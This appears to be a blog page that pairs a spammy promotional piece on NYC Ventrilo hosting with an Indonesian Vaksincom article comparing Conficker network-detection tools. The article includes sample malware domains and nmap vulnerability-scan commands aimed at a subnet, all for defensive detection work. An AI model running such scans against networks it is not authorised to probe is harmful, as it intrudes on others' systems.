&• Signing up for Ventrilo servers is usually easy. Simply fill out a short application available on the provider's website and you will be granted immediate access. There are no delays or credit checks. Unlike a few Ventrilo hosts, many NYC-based servers provide customer service that does not end once the gaming begins.

If, at anytime, you are unsatisfied with their servers, then a qualified technical expert will assist you and correct any problems that have arisen. They guarantee quality and technical assistance or you r payment will be completely refunded.

In fact, some are so confident in the quality of their Ventrilo servers that this guarantee extends to any compatibility issues between software and any installed operating systems.

• Worried about your computer's operating system and compatibility with the Ventrilo host? You need not fear since several host software works equally well with any operating system, including Windows Vista. Additionally, their high quality, high bandwidth, low latency Ventrilo servers work with all of the popular online games.

And their technical experts are constantly updating and upgrading both the software and hardware to ensure that your Ventrilo servers will continue to be compatible will all new and future online gaming platforms.

What does this mean to you? It simply guarantees performance with future gaming scenarios. If you have experienced Ventrilo servers with less than adequate results, then fell free to hunt a better Ventrilo provider….. If you are in the NYC area, you have some good options available to you.

So as a New York based gamer, we can't encourage you enough to:

1) take advantage of the sound quality of Ventrilo,

2) find a great, local host whose server is close to you to avoid data latencies,

3) find that host the provides high quality voice CHEAP.

Looking for information on, NYC Ventrilo Server. Information about NYC based ventrilo hosting.

Does The Computer Need A Defrag?

2009-09-09T06:05:00.000-07:00

Mega Test 5 Tools Conficker Network Detection

2009-08-26T04:20:00.000-07:00

Seiring dengan maraknya Swine Flu (Flu Babi) yang menyerang manusia dan menurut WHO sudah pada taraf kegentingan 4, bandara di seluruh dunia langsung bersiaga memantau para penumpang dari Meksiko dan Amerika Serikat. Kalau di dunia komputer yang menjadi sumber penyebaran virus adalah file yang terinfeksi virus, maka di dunia nyata, yang terinfeksi virus dan menjadi sarana penyebaran virus adalah manusia. Karena itu bandara menerapkan scanning atas penumpang yang dicurigai mengidap flu dengan menggunakan scanner suhu tubuh karena pengidap flu (apapun jenisnya) pasti mengalami peningkatan suhu tubuh karena badannya bereaksi atas adanya virus asing yang masuk. Sebenarnya prinsip di dunia komputer juga sama, kalau bandara menggunakan scanner suhu tubuh maka “bandara” di internet adalah router-router dan aplikasi yang digunakan bukan scanner tubuh manusia melainkan Firewall. Tetapi ada satu keunggulan yang dimiliki oleh dunia IT dibandingkan dunia manusia (jika dibandingkan) saat ini, dimana pada dunia manusia tidak mungkin (sangat sulit dan mahal) untuk dapat memantau seluruh manusia di satu kota dan menentukan siapa saja yang terinfeksi flu. Kalau di dunia IT kita bisa menggunakan scanner khusus untuk mendeteksi komputer mana saja yang terinfeksi virus sehingga dapat dilakukan antisipasi yang cepat dan efektif untuk menghadapi masalah virus.

Setelah melakukan test terhadap beberapa tools untuk membasmi Conficker, langkah berikutnya yang paling krusial jika anda administrator jaringan adalah mengidentifikasi komputer mana saja yang terinfeksi virus dan berusaha menyebarkan virus. Karena itu, Vaksincom melakukan pengetesan terhadap tools untuk mendeteksi komputer di jaringan yang terinfeksi Conficker dan berusaha melakukan penyebaran terhadap komputer dalam jaringan. Jika kita hanya melakukan pembersihan terhadap satu komputer saja tentu tidak masalah, tetapi bagaimana jika dalam jaringan anda terinfeksi komputer tetapi anda tidak tahu komputer mana yang terinfeksi, karena terkadang komputer yang menginfeksi jaringan kita tidak terduga-duga, misalnya komputer notebook yang sering dibawa pulang oleh pimpinan atau bagian yang sering dinas luar. Selain itu, jika kita memvonis komputer tertentu terinfeksi virus, tentunya kita harus memiliki bukti.

Conficker dan gejala (dalam jaringan....)

Jika pada mega test sebelumnya dijelaskan gejala conficker pada komputer tsb, maka kali ini kita harus mengatahui apa dampak conficker pada jaringan, sebagai berikut :

ü Berusaha mendownload dan mencoba akses pada 250 domain (conficker B) atau 50.000 domain (conficker C) yang random. Berikut beberapa domain yang random tsb :

aaidhe.net

barhkuuu.cn

cfhlglxofyz.biz

dtosuhc.org

elivvks.info

fsrljjeemkr.cc

gbmkghqcqy.ch

hudphigb.net

iqrzamxo.ws

jjhajbfcdmk.com

dst..................

ü Berusaha akses ke beberapa domain yang umum untuk mengecek waktu saat ini. Beberapa domain tsb yaitu :

baidu.com

google.com

yahoo.com

msn.com

ask.com

w3.org

aol.com

cnn.com

ebay.com

msn.com

myspace.com

facebook.com

rapidshare.com

ü Pada dasarnya virus ini berusaha melakukan penyebaran melalui default share windows menggunakan port 445, tetapi selain itu Conficker juga menggunakan port 1024 s/d 10000 untuk melakukan penyebaran pada jaringan komputer.

The Tools, Conficker Network Detection...

Dari beberapa tools yang ada, Vaksincom melakukan pengetesan beberapa tools yang familiar dan sering digunakan. Tools tsb dikeluarkan oleh beberapa vendor security untuk membantu mempermudah deteksi dari serangan Conficker pada jaringan anda.

Berikut beberapa tools yang tersedia sebagai berikut :

1) Wireshark

Wireshark/Ethereal merupakan salah satu dari sekian banyak tools Network Analyzer yang banyak digunakan oleh Network administrator untuk menganalisa kinerja jaringannya dan juga merupakan tools andalan Vaksinis (teknisi Vaksincom). Wireshark banyak disukai karena interfacenya yang menggunakan Graphical User Interface (GUI) atau tampilan grafis. Wireshark mampu menangkap paket-paket data/informasi yang berseliweran dalam jaringan yang kita “intip”. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan mudah ditangkap dan dianalisa. Tools ini tersedia di berbagai versi OS, seperti Windows, Linux, Macintosh, dll.

Pada awal kemunculan dan perkembangan Conficker, tools ini merupakan “pelopor” tools yang digunakan oleh beberapa vendor security untuk menganalisa paket-paket data/informasi dalam jaringan dari serangan Conficker. Anda dapat mendownload wireshark pada alamat http://www.wireshark.org/download.html.

Pada saat instalasi, perhatikan untuk mengaktifkan dan menginstall plugin MATE (Meta Analysis Tracing Engine), karena secara default belum diaktifkan. Plugin ini dapat berfungsi untuk memfilter seluruh paket-paket data dari berbagai protocol yang lewat dalam jaringan. Selain itu dalam proses instalasi juga disertakan WinPcap. Lakukan instalasi WinPcap, WinPcap merupakan driver yang digunakan untuk membaca dan mem-filter lalu lintas paket data/informasi yang lewat. (lihat gambar 1)

Gambar 1, Wireshark in action

Untuk penggunaannya cukup mudah, pada saat anda menjalankan Wireshark, pilih saja tab Capture kemudian pilih list Interfaces. Pada pilihan capture interfaces, pilih yang sesuai dengan jaringan LAN/Ethernet card anda kemudian klik tombol start. Wireshark juga memiliki kemampuan untuk melakukan scan komputer antar segmen.

Untuk deteksi Conficker, lakukan filter dengan protocol NBNS (NetBIOS Name Service) kemudian perhatikan info yang diberikan, umumnya NBNS akan membaca hostname komputer tetapi jika NBNS membaca selain hostname komputer dalam hal ini adalah domain-domain yang dituju oleh Conficker, maka source IP tsb merupakan komputer yang terinfeksi dan berusaha untuk menyebarkan dan mengupdate dirinya.

2) Nmap

Nmap (Network Mapper) merupakan salah satu tools eksplorasi jaringan, dan secara eksklusif menjadi salah satu andalan yang sering digunakan oleh administrator jaringan. Dengan Nmap kita dapat melakukan penelusuran ke seluruh jaringan dan mencari tahu service apa yang aktif pada port yang lebih spesifik. Nmap merupakan salah satu tools yang paling banyak digunakan untuk melakukan scanning jaringan dan terkenal sebagai tool yang multi platform, cepat dan ringan. Nmap berjalan pada semua jenis OS, baik mode console maupun grafis. Hebatnya lagi, tidak seperti Wireshark, Nmap juga melakukan scanning pada celah keamanan MS08-067 yang di eksploitasi oleh Conficker sehingga dapat membantu administrator menentukan komputer mana saja yang masih memiliki celah keamanan yang dapat dieksploitasi oleh Conficker. Selain itu, Nmap juga memiliki satu keunggulan yang mungkin membuat administrator jaringan besar jatuh cinta, ia dapat melakukan scanning komputer antar segmen.

Terhadap kemunculan dan perkembangan Conficker, Nmap dengan bantuan source code dari Tillman Werner dan Felix Leder dari The Honeynet Project, telah merilis versi baru dengan tambahan fitur deteksi terhadap komputer yang terinfeksi Conficker. Anda dapat mendownload versi terbaru pada alamat http://nmap.org/download.html.

Proses instalasi Nmap cukup mudah, sama halnya seperti wireshark, Nmap juga melakukan instalasi terhadap WinPcap (jika belum terinstall). Jika sudah terinstall WinPcap, biasanya akan terjadi error dan proses instalasi WinPcap sebaiknya di lewatkan saja. (lihat gambar 2)

Gambar 2, NMAP yang juga mampu memantau jaringan tidak kalah dari Wireshark

Untuk penggunaannya, baik mode console maupun GUI, kita tetap menggunakan perintah command. Penggunaan command untuk mendeteksi Conficker ada 2 cara :

- Scan jaringan dengan membaca port 139 & 445 (lebih cepat) :

nmap -p 139,445 -T4 --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args checkconficker=1,safe=1 192.168.1.1/24 (contoh dengan jaringan IP 192.168.1…..)

- Scan jaringan dengan membaca seluruh port yang digunakan Conficker (agak lambat) :

nmap -p - -T4 --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args checkall=1,safe=1 192.168.1.1/24 (contoh dengan jaringan IP 192.168.1….)

3) Retina Network Security Scanner (Conficker Worm)

Walaupun agak terlambat dan diluncurkan menjelang 1 April 2009, sebagai salah satu vendor keamanan komputer, eEye Digital Security juga ikut meluncurkan tools khusus dan gratis untuk mendeteksi keberadaan Conficker dalam jaringan. Tools ini didesain untuk mendeteksi keberadaan Conficker dan sekaligus mendeteksi vulnerability windows tsb dari celah keamanan Windows Server Service (patch MS08-067). Anda dapat mendownload tools ini pada alamat http://www.eeye.com/html/downloads/other/ConfickerScanner.html.

Proses instalasi sangat mudah dan cepat, anda cukup menjalankan file instalasi yang dilanjutkan perintah-perintah selanjutnya hingga selesai. (lihat gambar 3)

Gambar 3, Eeye yang merupakan pakar vulnerability Windows meluncurkan Retina Scanner untuk Conficker.

Bagi pengguna umum, tools Retina dari Eeye relatif lebih mudah dibandingkan Wireshark dan Nmap, saat anda menjalankan tools ini anda dapat langsung memilih target yang diinginkan baik single IP maupun dengan range IP. Jika sudah, anda dapat langsung klik tombol scan. Jika sudah selesai akan muncul box pesan tanda selesai. Hasil dari scan tsb terdapat 4 kategori yaitu :

- Not Tested (biasanya dikarenakan port 445 tertutup/disable, sehingga tidak bisa scan)

- Infected (komputer terdeteksi terinfeksi Conficker)

- Patched (komputer bersih dan sudah di patch MS08-067)

- Vulnerable (komputer bersih tetapi belum di patch, rawan terinfeksi Conficker)

Sayangnya tools ini hanya membaca port 139 dan 445, sehingga sangat sulit jika komputer yang terinfeksi tidak mengaktifkan port tsb (File and Printer Sharing). Selain itu, Retina tidak dapat melakukan scanning antar segmen dan juga tidak memantau port 1024 – 10.000 yang di eksploitasi oleh Conficker.

4) SCS (Simple Conficker Scanner)

Tools simple dan canggih buatan Tillman Werner dan Felix Leder dari The Honeynet Project, yang pada saat awal diluncurkan banyak digunakan oleh Vaksincom untuk mendeteksi IP – IP ISP Indonesia yang terinfeksi Conficker ini menjadi rujukan beberapa vendor untuk membuat tools sejenis. Mereka membuat tools conficker network scanner dari bahasa Python yang kemudian beserta source code-nya dipublish secara bebas. Tercatat beberapa vendor seperti Nmap, eEye dan Foundstone menggunakan source code yang kemudian di compile dan dijadikan plugin tools masing-masing vendor untuk digunakan mendeteksi conficker. Tools ini dapat didownload pada alamat http://www.4shared.com/get/95921961/d7727fab/scs.html .

SCS tidak perlu diinstall, anda hanya perlu akstrak pada folder/drive yang anda tentukan saja. Tetapi untuk menjalankan SCS anda perlu meng-install Nmap. Hal ini dikarenakan SCS membutuhkan driver paket monitoring data. (lihat gambar 4)

Gambar 4, Simple Conficker Scanner yang simple tetapi canggih

Untuk penggunaannya, SCS menggunakan mode console atau command prompt. Pada mode command prompt, pindah pada folder scs kemudian ketik perintah berikut :

“scs [IP_Awal] [IP Akhir]” , contoh : C:\scs>scs 192.168.1.1 192.168.1.255

Sama seperti Retina, SCS hanya membaca port 139 dan 445 saja.

5) Conficker Detection Tool (MCDT)

Melalui salah satu divisi-nya yaitu Foundstone, McAfee ikut merilis salah satu tools network untuk mendeteksi keberadaan conficker. Tools yang juga menggunakan source dari Tillman Werner dan Felix Leder dari The Honeynet Project, merupakan pengembangan dari team Foundstone yang didesain untuk mendeteksi keberadaan komputer yang terinfeksi conficker, dan telah dipublish secara gratis. Anda dapat mendownload pada alamat http://www.mcafee.com/us/enterprise/confickertest.html .

Tools ini tidak perlu diinstall, anda hanya perlu ekstrak pada direktori / drive yang anda tentukan saja. (lihat gambar 5)

Gambar 5, Conficker Detection Tool in action

Untuk penggunaannya pun cukup mudah, saat anda menjalankan tools ini anda dapat langsung memilih range target yang diinginkan. Bahkan anda dapat melakukan scanning jika terdapat beberapa segmen pada jaringan komputer anda, hal ini yang tidak terdapat pada Retina. Tetapi sayangnya tools ini tidak melakukan pemeriksaan pada celah keamanan MS08-067 yang di eksploitasi Conficker seperti Nmap dan Retina. Berbeda dengan Retina, tools ini memiliki 3 kategori hasil scan yaitu :

- INFECTED (komputer terinfeksi conficker)

- Not infected (komputer bersih atau tidak terinfeksi)

- Not tested (biasanya dikarenakan port 445 tertutup/disable, sehingga tidak bisa scan)

Sama seperti halnya Retina dan SCS, tool ini hanya membaca port 139 dan 445 (File Printer Sharing) dan tidak melakukan pemantauan atas port 1024 – 10.000 yang di eksploitasi oleh Conficker.

Hasil Perbandingan.....

Dari beberapa tools tsb, kami me-review dan membuat tabel perbandingan-nya sebagai berikut :

Keterangan	*Wireshark*	*Nmap*	*Retina*	*SCS*	*MCDT*
Modus Program/Aplikasi	Installer	Installer	Installer	Portable	Portable
Modus Penggunaan	GUI	Command	GUI	Command	GUI
Deteksi Port 139	√	√	√	√	√
Deteksi Port 445	√	√	√	√	√
Deteksi Port 1024 s/d 10000	√	√	-	-	-
Status Deteksi Conficker	Broadcast	√	√	√	√
Kecepatan Scan (1-3)	1	1	3	2	3
Scan antar segmen/segmen lain	√	√	-	√	√
Scan vulnerability (patch MS08-067)	-	√	√	-	-

Dari hasil pengujian yang dilakukan oleh lab Vaksincom, terlihat bahwa tidak ada tools yang sempurna. Masing-masing tools memiliki kelebihan dan kekurangannya masing-masing. Nmap walaupun memiliki fitur yang paling lengkap tetapi memiliki kelemahan pada sisi penggunaan yang masih menggunakan command dan kecepatan scan yang lambat dibanding tools yang lain. Sementara MCDT merupakan tools yang sangat simple tanpa instalasi serta proses scan cukup cepat memilki kelemahan tidak dapat berfungsi dengan baik jika port 445 ditutup/disable (File and Printer Sharing di non aktifkan) dan tidak melakukan pemeriksaan pada celah keamanan MS08-067 yang dieksploitasi oleh Conficker.